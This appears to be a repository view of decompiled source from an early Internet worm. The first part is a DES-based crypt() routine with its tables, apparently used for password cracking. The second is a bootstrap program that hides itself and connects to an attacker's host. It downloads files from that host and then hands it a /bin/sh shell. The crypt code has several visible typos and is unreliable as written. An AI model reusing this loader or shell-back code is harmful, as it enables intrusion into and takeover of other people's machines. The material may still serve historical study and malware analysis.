0x00000002, 0x02000002, 0x00020002, 0x02020002,
0x00000202, 0x02000202, 0x00020202, 0x02020202,};
int ipi_La[] = {
0x00000000, 0x08000000, 0x00080000, 0x08080000,
0x00000800, 0x08000800, 0x00080800, 0x08080800,
0x00000008, 0x08000008, 0x00080008, 0x08080008,
0x00000808, 0x08000808, 0x00080808, 0x08080808,};
int ipi_Lc[] = {
0x00000000, 0x20000000, 0x00200000, 0x20200000,
0x00002000, 0x20002000, 0x00202000, 0x20202000,
0x00000020, 0x20000020, 0x00200020, 0x20200020,
0x00002020, 0x20002020, 0x00202020, 0x20202020,};
int ipi_Le[] = {
0x00000000, 0x80000000, 0x00800000, 0x80800000,
0x00008000, 0x80008000, 0x00808000, 0x80808000,
0x00000080, 0x80000080, 0x00800080, 0x80800080,
0x00008080, 0x80008080, 0x00808080, 0x80808080,};
int ipi_H1[] = {
0x00000000, 0x01000000, 0x00010000, 0x01010000,
0x00000100, 0x01000100, 0x00010100, 0x01010100,
0x00000001, 0x01000001, 0x00010001, 0x01010001,
0x00000101, 0x01000101, 0x00010101, 0x01010101,};
int ipi_H3[] = {
0x00000000, 0x04000000, 0x00040000, 0x04040000,
0x00000400, 0x04000400, 0x00040400, 0x04040400,
0x00000004, 0x04000004, 0x00040004, 0x04040004,
0x00000404, 0x04000404, 0x00040404, 0x04040404,};
int ipi_H5[] = {
0x00000000, 0x10000000, 0x00100000, 0x10100000,
0x00001000, 0x10001000, 0x00101000, 0x10101000,
0x00000010, 0x10000010, 0x00100010, 0x10100010,
0x00001010, 0x10001010, 0x00101010, 0x10101010,};
int ipi_H7[] = {
0x00000000, 0x40000000, 0x00400000, 0x40400000,
0x00004000, 0x40004000, 0x00404000, 0x40404000,
0x00000040, 0x40000040, 0x00400040, 0x40400040,
0x00004040, 0x40004040, 0x00404040, 0x40404040,};
int ipi_H9[] = {
0x00000000, 0x02000000, 0x00020000, 0x02020000,
0x00000200, 0x02000200, 0x00020200, 0x02020200,
0x00000002, 0x02000002, 0x00020002, 0x02020002,
0x00000202, 0x02000202, 0x00020202, 0x02020202,};
int ipi_Hb[] = {
0x00000000, 0x08000000, 0x00080000, 0x08080000,
0x00000800, 0x08000800, 0x00080800, 0x08080800,
0x00000008, 0x08000008, 0x00080008, 0x08080008,
0x00000808, 0x08000808, 0x00080808, 0x08080808,};
int ipi_Hd[] = {
0x00000000, 0x20000000, 0x00200000, 0x20200000,
0x00002000, 0x20002000, 0x00202000, 0x20202000,
0x00000020, 0x20000020, 0x00200020, 0x20200020,
0x00002020, 0x20002020, 0x00202020, 0x20202020,};
int ipi_Hf[] = {
0x00000000, 0x80000000, 0x00800000, 0x80800000,
0x00008000, 0x80008000, 0x00808000, 0x80808000,
0x00000080, 0x80000080, 0x00800080, 0x80800080,
0x00008080, 0x80008080, 0x00808080, 0x80808080,};
int SP0[] = {
0x08000820, 0x00000800, 0x00020000, 0x08020820,
0x08000000, 0x08000820, 0x00000020, 0x08000000,
0x00020020, 0x08020000, 0x08020820, 0x00020800,
0x08020800, 0x00020820, 0x00000800, 0x00000020,
0x08020000, 0x08000020, 0x08000800, 0x00000820,
0x00020800, 0x00020020, 0x08020020, 0x08020800,
0x00000820, 0x00000000, 0x00000000, 0x08020020,
0x08000020, 0x08000800, 0x00020820, 0x00020000,
0x00020820, 0x00020000, 0x08020800, 0x00000800,
0x00000020, 0x08020020, 0x00000800, 0x00020820,
0x08000800, 0x00000020, 0x08000020, 0x08020000,
0x08020020, 0x08000000, 0x00020000, 0x08000820,
0x00000000, 0x08020820, 0x00020020, 0x08000020,
0x08020000, 0x08000800, 0x08000820, 0x00000000,
0x08020820, 0x00020800, 0x00020800, 0x00000820,
0x00000820, 0x00020020, 0x08000000, 0x08020800,};
int SP1[] = {
0x00100000, 0x02100001, 0x02000401, 0x00000000,
0x00000400, 0x02000401, 0x00100401, 0x02100400,
0x02100401, 0x00100000, 0x00000000, 0x02000001,
0x00000001, 0x02000000, 0x02100001, 0x00000401,
0x02000400, 0x00100401, 0x00100001, 0x02000400,
0x02000001, 0x02100000, 0x02100400, 0x00100001,
0x02100000, 0x00000400, 0x00000401, 0x02100401,
0x00100400, 0x00000001, 0x02000000, 0x00100400,
0x02000000, 0x00100400, 0x00100000, 0x02000401,
0x02000401, 0x02100001, 0x02100001, 0x00000001,
0x00100001, 0x02000000, 0x02000400, 0x00100000,
0x02100400, 0x00000401, 0x00100401, 0x02100400,
0x00000401, 0x02000001, 0x02100401, 0x02100000,
0x00100400, 0x00000000, 0x00000001, 0x02100401,
0x00000000, 0x00100401, 0x02100000, 0x00000400,
0x02000001, 0x02000400, 0x00000400, 0x00100001,};
int SP2[] = {
0x10000008, 0x10200000, 0x00002000, 0x10202008,
0x10200000, 0x00000008, 0x10202008, 0x00200000,
0x10002000, 0x00202008, 0x00200000, 0x10000008,
0x00200008, 0x10002000, 0x10000000, 0x00002008,
0x00000000, 0x00200008, 0x10002008, 0x00002000,
0x00202000, 0x10002008, 0x00000008, 0x10200008,
0x10200008, 0x00000000, 0x00202008, 0x10202000,
0x00002008, 0x00202000, 0x10202000, 0x10000000,
0x10002000, 0x00000008, 0x10200008, 0x00202000,
0x10202008, 0x00200000, 0x00002008, 0x10000008,
0x00200000, 0x10002000, 0x10000000, 0x00002008,
0x10000008, 0x10202008, 0x00202000, 0x10200000,
0x00202008, 0x10202000, 0x00000000, 0x10200008,
0x00000008, 0x00002000, 0x10200000, 0x00202008,
0x00002000, 0x00200008, 0x10002008, 0x00000000,
0x10202000, 0x10000000, 0x00200008, 0x10002008,};
int SP3[] = {
0x00000080, 0x01040080, 0x01040000, 0x21000080,
0x00040000, 0x00000080, 0x20000000, 0x01040000,
0x20040080, 0x00040000, 0x01000080, 0x20040080,
0x21000080, 0x21040000, 0x00040080, 0x20000000,
0x01000000, 0x20040000, 0x20040000, 0x00000000,
0x20000080, 0x21040080, 0x21040080, 0x01000080,
0x21040000, 0x20000080, 0x00000000, 0x21000000,
0x01040080, 0x01000000, 0x21000000, 0x00040080,
0x00040000, 0x21000080, 0x00000080, 0x01000000,
0x20000000, 0x01040000, 0x21000080, 0x20040080,
0x01000080, 0x20000000, 0x21040000, 0x01040080,
0x20040080, 0x00000080, 0x01000000, 0x21040000,
0x21040080, 0x00040080, 0x21000000, 0x21040080,
0x01040000, 0x00000000, 0x20040000, 0x21000000,
0x00040080, 0x01000080, 0x20000080, 0x00040000,
0x00000000, 0x20040000, 0x01040080, 0x20000080,};
int SP4[] = {
0x80401000, 0x80001040, 0x80001040, 0x00000040,
0x00401040, 0x80400040, 0x80400000, 0x80001000,
0x00000000, 0x00401000, 0x00401000, 0x80401040,
0x80000040, 0x00000000, 0x00400040, 0x80400000,
0x80000000, 0x00001000, 0x00400000, 0x80401000,
0x00000040, 0x00400000, 0x80001000, 0x00001040,
0x80400040, 0x80000000, 0x00001040, 0x00400040,
0x00001000, 0x00401040, 0x80401040, 0x80000040,
0x00400040, 0x80400000, 0x00401000, 0x80401040,
0x80000040, 0x00000000, 0x00000000, 0x00401000,
0x00001040, 0x00400040, 0x80400040, 0x80000000,
0x80401000, 0x80001040, 0x80001040, 0x00000040,
0x80401040, 0x80000040, 0x80000000, 0x00001000,
0x80400000, 0x80001000, 0x00401040, 0x80400040,
0x80001000, 0x00001040, 0x00400000, 0x80401000,
0x00000040, 0x00400000, 0x00001000, 0x00401040,};
int SP5[] = {
0x00000104, 0x04010100, 0x00000000, 0x04010004,
0x04000100, 0x00000000, 0x00010104, 0x04000100,
0x00010004, 0x04000004, 0x04000004, 0x00010000,
0x04010104, 0x00010004, 0x04010000, 0x00000104,
0x04000000, 0x00000004, 0x04010100, 0x00000100,
0x00010100, 0x04010000, 0x04010004, 0x00010104,
0x04000104, 0x00010100, 0x00010000, 0x04000104,
0x00000004, 0x04010104, 0x00000100, 0x04000000,
0x04010100, 0x04000000, 0x00010004, 0x00000104,
0x00010000, 0x04010100, 0x04000100, 0x00000000,
0x00000100, 0x00010004, 0x04010104, 0x04000100,
0x04000004, 0x00000100, 0x00000000, 0x04010004,
0x04000104, 0x00010000, 0x04000000, 0x04010104,
0x00000004, 0x00010104, 0x00010100, 0x04000004,
0x04010000, 0x04000104, 0x00000104, 0x04010000,
0x00010104, 0x00000004, 0x04010004, 0x00010100,};
int SP6[] = {
0x40084010, 0x40004000, 0x00004000, 0x00084010,
0x00080000, 0x00000010, 0x40080010, 0x40004010,
0x40000010, 0x40084010, 0x40084000, 0x40000000,
0x40004000, 0x00080000, 0x00000010, 0x40080010,
0x00084000, 0x00080010, 0x40004010, 0x00000000,
0x40000000, 0x00004000, 0x00084010, 0x40080000,
0x00080010, 0x40000010, 0x00000000, 0x00084000,
0x00004010, 0x40084000, 0x40080000, 0x00004010,
0x00000000, 0x00084010, 0x40080010, 0x00080000,
0x40004010, 0x40080000, 0x40084000, 0x00004000,
0x40080000, 0x40004000, 0x00000010, 0x40084010,
0x00084010, 0x00000010, 0x00004000, 0x40000000,
0x00004010, 0x40084000, 0x00080000, 0x40000010,
0x00080010, 0x40004010, 0x40000010, 0x00080010,
0x00084000, 0x00000000, 0x40004000, 0x00004010,
0x40000000, 0x40080010, 0x40084010, 0x00084000,};
int SP7[] = {
0x00808200, 0x00000000, 0x00008000, 0x00808202,
0x00808002, 0x00008202, 0x00000002, 0x00008000,
0x00000200, 0x00808200, 0x00808202, 0x00000200,
0x00800202, 0x00808002, 0x00800000, 0x00000002,
0x00000202, 0x00800200, 0x00800200, 0x00008200,
0x00008200, 0x00808000, 0x00808000, 0x00800202,
0x00008002, 0x00800002, 0x00800002, 0x00008002,
0x00000000, 0x00000202, 0x00008202, 0x00800000,
0x00008000, 0x00808202, 0x00000002, 0x00808000,
0x00808200, 0x00800000, 0x00800000, 0x00000200,
0x00808002, 0x00008000, 0x00008200, 0x00800002,
0x00000200, 0x00000002, 0x00800202, 0x00008202,
0x00808202, 0x00008002, 0x00808000, 0x00800202,
0x00800002, 0x00000202, 0x00008202, 0x00808200,
0x00000202, 0x00800200, 0x00800200, 0x00000000,
0x00008002, 0x00008200, 0x00000000, 0x00808002,};
int PC1[] = {
0x10000000, 0x00000000, 0x00100000, 0x00000000,
0x00001000, 0x00000000, 0x00000010, 0x00000000,
0x00000000, 0x00010000, 0x00000000, 0x01000000,
0x00000001, 0x00000000, 0x00000000, 0x00000000,
0x20000000, 0x00000000, 0x00200000, 0x00000000,
0x00002000, 0x00000000, 0x00000020, 0x00000000,
0x00000000, 0x00020000, 0x00000000, 0x02000000,
0x00000002, 0x00000000, 0x00000000, 0x00000000,
0x40000000, 0x00000000, 0x00400000, 0x00000000,
0x00004000, 0x00000000, 0x00000040, 0x00000000,
0x00000000, 0x00040000, 0x00000000, 0x04000000,
0x00000004, 0x00000000, 0x00000000, 0x00000000,
0x80000000, 0x00000000, 0x00800000, 0x00000000,
0x00008000, 0x00000000, 0x00000080, 0x00000000,
0x00000000, 0x00080000, 0x00000000, 0x08000000,
0x00000008, 0x00000000, 0x00000000, 0x00000000,
0x01000000, 0x00000000, 0x00010000, 0x00000000,
0x00000100, 0x00000000, 0x00000000, 0x00000100,
0x00000000, 0x00001000, 0x00000000, 0x00100000,
0x00000000, 0x10000000, 0x00000000, 0x00000000,
0x02000000, 0x00000000, 0x00020000, 0x00000000,
0x00000200, 0x00000000, 0x00000000, 0x00000200,
0x00000000, 0x00002000, 0x00000000, 0x00200000,
0x00000000, 0x20000000, 0x00000000, 0x00000000,
0x04000000, 0x00000000, 0x00040000, 0x00000000,
0x00000400, 0x00000000, 0x00000000, 0x00000400,
0x00000000, 0x00004000, 0x00000000, 0x00400000,
0x00000000, 0x40000000, 0x00000000, 0x00000000,
0x08000000, 0x00000000, 0x00080000, 0x00000000,
0x00000800, 0x00000000, 0x00000000, 0x00000800,
0x00000000, 0x00008000, 0x00000000, 0x00800000,
0x00000000, 0x80000000, 0x00000000, 0x00000000,};
int PC2[] = {
0x00000000, 0x20000000, 0x00000000, 0x00800000,
0x00000000, 0x00000000, 0x00000000, 0x00040000,
0x00000010, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x02000000, 0x00000001, 0x00000000,
0x00000080, 0x00000000, 0x00000000, 0x00100000,
0x00000000, 0x00000000, 0x00000000, 0x08000000,
0x00000000, 0x40000000, 0x00000000, 0x00200000,
0x00000008, 0x00000000, 0x00000000, 0x10000000,
0x00000000, 0x04000000, 0x00000000, 0x00080000,
0x00000000, 0x80000000, 0x00000040, 0x00000000,
0x00000000, 0x00400000, 0x00000000, 0x00000000,
0x00000004, 0x00000000, 0x00000000, 0x01000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x08000000, 0x00000000, 0x00000100, 0x00000000,
0x02000000, 0x00000000, 0x00010000, 0x00000000,
0x04000000, 0x00000000, 0x00400000, 0x00000000,
0x00001000, 0x00000000, 0x00004000, 0x00000000,
0x00000000, 0x00000000, 0x00100000, 0x00000000,
0x20000000, 0x00000000, 0x00020000, 0x00000000,
0x00000200, 0x00000000, 0x80000000, 0x00000000,
0x00800000, 0x00000000, 0x00002000, 0x00000000,
0x40000000, 0x00000000, 0x00000000, 0x00000000,
0x00040000, 0x00000000, 0x00000400, 0x00000000,
0x00200000, 0x00000000, 0x00000000, 0x00000000,
0x00080000, 0x00000000, 0x10000000, 0x00000000,
0x00000000, 0x00000000, 0x00008000, 0x00000000,
0x00000800, 0x00000000, 0x01000000, 0x00000000,
0x00000000, 0x00020000, 0x00000002, 0x00000000,
0x00000020, 0x00000000, 0x00000000, 0x00010000,};
static extra;
char E[48]; /* 0x255c4 */
char *crypt(passwd, salt) /* 0x68f8 */
char *passwd, *salt;
{
int temp, l8;
register i, j;
register c; /*d7, d6, d5*/
static char iobuf[10]; /* 0x27f34 */
static unsigned x27f44;
static unsigned x27f48;
x27f44 = 0;
x27f48 = 0;
for( i = 0; i < 48; i++)
E[i] = e[i];
for(i = 0; (c = *passwd) && (i < 32); i++, passwd++)
for(j = 0; j < 7; j++, i++) {
l8 = (c >> (6 - j)) & 01;
x27f44 |= (l8 << (31 - i));
}
for (i = 0; (c = *passwd) && (i < 32); i++, passwd++)
for(j = 0; j < 7; j++, i++) {
l8 = (c >> (6 - j)) & 01;
x27f48 |= (l8 << (31 - i));
}
compkeys(&x27f44, 0);
for(i=0;i<2;i++){
c = *salt++;
iobuf[i] = c;
if(c>'Z') c -= 6;
if(c>'9') c -= 7;
c -= '.';
for(j=0;j<6;j++){
if((c>>j) & 01){
temp = E[6*i+j];
E[6*i+j] = E[6*i+j+24];
E[6*i+j+24] = temp;
}
}
}
mungE();
x27f44 = 0;
x27f48 = 0;
des(&x27f44, &x27f44);
ipi(&x27f44, &x27f44);
for(i=0; i<11; i++){
c = x27f44 >> 26;
x27f44 = x27f44 << 6;
x27f44 |= x27f48 >> 26;
x27f48 = x27f48 << 6;
c += '.';
if(c > '9') c += 7;
if(c > 'Z') c += 6;
iobuf[i+2] = c;
}
iobuf[i+2] = 0;
if(iobuf[1] == 0)
iobuf[1] = iobuf[0];
return(iobuf);
}
int E_H[8][16]; /* 0x251c4 */
int E_L[8][16]; /* 0x253c4 */
mungE() /* 0x6b2a */
{
register i, j, d5, d4, d3, d2;
register *a5, *a4;
int l28;
for(i = 0; i < 8; i++) {
a5 = E_L[i];
a4 = E_H[i];
for(j = 0; j < 16; j++) {
*a5++ = 0;
*a4++ = 0;
}
}
for (j = 0; j < 32; j++) {
d2 = 1 << (31 - j);
d3 = 31 - E[j];
d4 = 1 << (d3 & 3);
a5 = E_L[d3 >> 2];
for (i = 1; i < 16; i++)
if (i & d4)
a5[i] |= d2;
}
for (j = 32; j < 48; j++) {
d2 = 1 << (63-j);
d3 = 31 - E[j];
d4 = 1 << (d3 & 3);
a5 = E_H[d3 >> 2];
for (i = 1; i < 16; i++)
if (i & d4)
a5[i] |= d2;
}
}
int keys_H[16], keys_L[16]; /* 0x255f4,0x25634 */
compkeys(iptr, key) /* 0x6c04 */
int *iptr;
{
int i, l8, l12, l16;
register d7, d6, d5, d4, d3, d2;
d7 = 0;
d6 = 0;
for (d3 = 0, d2 = iptr[1]; d3 < 64; d2*=2, d3+=2)
if (d2 < 0) {
d7 |= PC1[d3];
d6 |= PC1[d3+1];
}
for (d2 = iptr[0]; d3 < 128; d2*=2, d3+=2)
if (d2 < 0) {
d7 |= PC1[d3];
d6 |= PC1[d3+1];
}
for (i = 0; i < 16; i++) {
for (d2 = 0; d2 < shift[i]; d2++) {
l16 = l12 = l8 = 0;
if (d7 < 0)
l8 = 16;
if (d7 & 0x08)
l12 = 256;
if (d6 < 0)
l16 = 1;
d7 = ((d7 << 1) & ~0x10) | l8 | l16;
d6 = (d6 << 1) | l12;
}
d5 = 0;
d4 = 0;
for (d3=0, d2=d6; d3 < 64; d2*=2, d3+=2) {
if (d2 < 0) {
d5 |= PC2[d3];
d4 |= PC2[d3+1];
}
}
for (d2=d7; d3 < 128; d2*=2, d3+=2) {
if (d2 < 0) {
d5 |= PC2[d3];
d4 |= PC2[d3+1];
}
}
if (key) {
keys_L[15-i] = d5;
keys_H[15-i] = d4;
} else {
keys_L[i] = d5;
keys_H[i] = d4;
}
}
}
setupE()
{
int i, j, l12;
for(i = 0; i < 8; i++)
for(j = 0; j < 16; j++)
E_H[i][j] = E_H[i][j] = 0;
for (j = 0; j < 32; j++) {
l12 = 31 - E[j];
for (i = 0; i < 16; i++)
if ((1 << (l12 % 4)) & i)
E_L[l12 / 4][i] |= (1 << (31 - j));
}
for (j = 32; j < 48; j++) {
l12 = 31 - E[j];
for (i = 0; i < 16; i++)
if ((1 << (l12 % 4)) & i)
E_H[l12 / 4][i] |= (1 << (63 - j));
}
}
des(adr1, adr2)
int *adr1, *adr2;
{
int l4, *l8, *l12, l16;
register unsigned d7;
register unsigned d6, d5;
register d4, d3, d2;
l4 = adr1[0];
d2 = adr1[1];
for (l16 = 0; l16 < 25; l16++) {
l8 = keys_L;
l12 = keys_H;
for( d3 = 0; d3 < 16; d3++) {
d5 = d2;
d7 = E_L[0][d4 = d5 & 0x0f];
d6 = E_H[0][d4];
d5 >>= 4;
d7 |= E_L[1][d4 = (d5 & 0x0f)];
d6 |= E_H[1][d4];
d5 >>= 4;
d7 |= E_L[2][d4 = (d5 & 0x0f)];
d6 |= E_H[2][d4];
d5 >>= 4;
d7 |= E_L[3][d4 = (d5 & 0x0f)];
d6 |= E_H[3][d4];
d5 >>= 4;
d7 |= E_L[4][d4 = (d5 & 0x0f)];
d6 |= E_H[4][d4];
d5 >>= 4;
d7 |= E_L[5][d4 = (d5 & 0x0f)];
d6 |= E_H[5][d4];
d5 >>= 4;
d7 |= E_L[6][d4 = (d5 & 0x0f)];
d6 |= E_H[6][d4];
d5 >>= 4;
d7 |= E_L[7][d4 = (d5 & 0x0f)];
d6 |= E_H[7][d4];
d7 ^= *l8++;
d6 ^= *l12++;
d5 = SPO[(d6 >> 16) & 0x3f];
d5 |= SP1[(d6 >> 22) & 00x3f];
d5 |= SP2[((d7 & 0x03) << 4) | ((d6 >> 28) & 0x0f)];
d5 |= SP3[(d7 >> 2) & 0x3f];
d5 |= SP4[(d7 >> 8) & 0x3f];
d5 |= SP5[(d7 >> 14) & 0x3f];
d5 |= SP6[(d7 >> 20) & 0x3f];
d5 |= SP7[(d7 >> 26) & 0x3f];
{ d6 = 14;
l4 = d2;
d2 = d6 ^ d5;
}
}
d5 = l4;
l4 = d2;
d2 = d5;
}
adr2[0] = l4;
adr2[1] = d2;
}
ipi(iptr1, iptr2)
int *iptr1, *iptr2;
{
register unsigned d7, d6, d5;
d5 = iptr1[0];
d7 = ipi_L0[d5 & 0x0f];
d5 = >>= 4;
d6 = ipi_H1[d5 & 0x0f];
d5 >>= 4;
d7 |= ipi_L2[d5 & 0x0f];
d5 >>= 4;
d6 |= ipi_H3[d5 & 0x0f];
d5 >>= 4;
d7 |= ipi_L4[d5 & 0x0f];
d5 >>= 4;
d6 |= ipi_H5[d5 & 0x0f];
d5 >>= 4;
d7 | ipi_L6[d5 & 0x0f];
d5 >>=4;
d6 |= ipi_H7[d5 & 0x0f];
d5 = iptr1[1];
d7 |= ipi_L8[d5 & 0x0f];
d5 >>= 4;
d6 |= ipi_H9[d5 & 0x0f];
d5 >>= 4;
d7 |= ipi_La[d5 & 0x0f];
d5 >>= 4;
d6 |= ipi_Hb[d5 & 0x0f];
d5 >>=4;
d7 |= ipi_Lc[d5 & 0x0f];
d5 >>= 4;
d6 |= ipi_Hd[d5 & 0x0f];
d5 >>= 4;
d7 |= ipi_Le[d5 & 0x0f];
d5 >>= 4;
d6 |= ipi_Hf[d5 & 0x0f];
iptr2[0] = d7;
ipyr2[1] = d6;
}
/*
* Local variables:
* compile-command: "make"
* comment-collumn: 48
* End:
*/

100
x8113550.c Normal file
View File

@@ -0,0 +1,100 @@
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
main(argc, argv)
char *argv[];
{
struct sockaddr_in sin;
int s, i, magic, nfiles, j, len, n;
FILE *fp;
char files[20][128];
char buf[2048], *p;
unlink(argv[0]);
if(argc != 4)
exit(1);
for(i = 0; i < 32; i++)
close(i);
i = fork();
if(i < 0)
exit(1);
if(i > 0)
exit(0);
bzero(&sin, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(atoi(argv[2]));
magic = htonl(atoi(argv[3]));
for(i = 0; i < argc; i++)
for(j = 0; argv[i][j]; j++)
argv[i][j] = '\0';
s = socket(AF_INET, SOCK_STREAM, 0);
if(connect(s, &sin, sizeof(sin)) < 0){
perror("l1 connect");
exit(1);
}
dup2(s, 1);
dup2(s, 2);
write(s, &magic, 4);
nfiles = 0;
while(1){
if(xread(s, &len, 4) != 4)
goto bad;
len = ntohl(len);
if(len == -1)
break;
if(xread(s, &(files[nfiles][0]), 128) != 128)
goto bad;
unlink(files[nfiles]);
fp = fopen(files[nfiles], "w");
if(fp == 0)
goto bad;
nfiles++;
while(len > 0){
n = sizeof(buf);
if(n > len)
n = len;
n = read(s, buf, n);
if(n <= 0)
goto bad;
if(fwrite(buf, 1, n, fp) != n)
goto bad;
len -= n;
}
fclose(fp);
}
execl("/bin/sh", "sh", 0);
bad:
for(i = 0; i < nfiles; i++)
unlink(files[i]);
exit(1);
}
static
xread(fd, buf, n)
char *buf;
{
int cc, n1;
n1 = 0;
while(n1 < n){
cc = read(fd, buf, n - n1);
if(cc <= 0)
return(cc);
buf += cc;
n1 += cc;
}
return(n1);
}
int zz;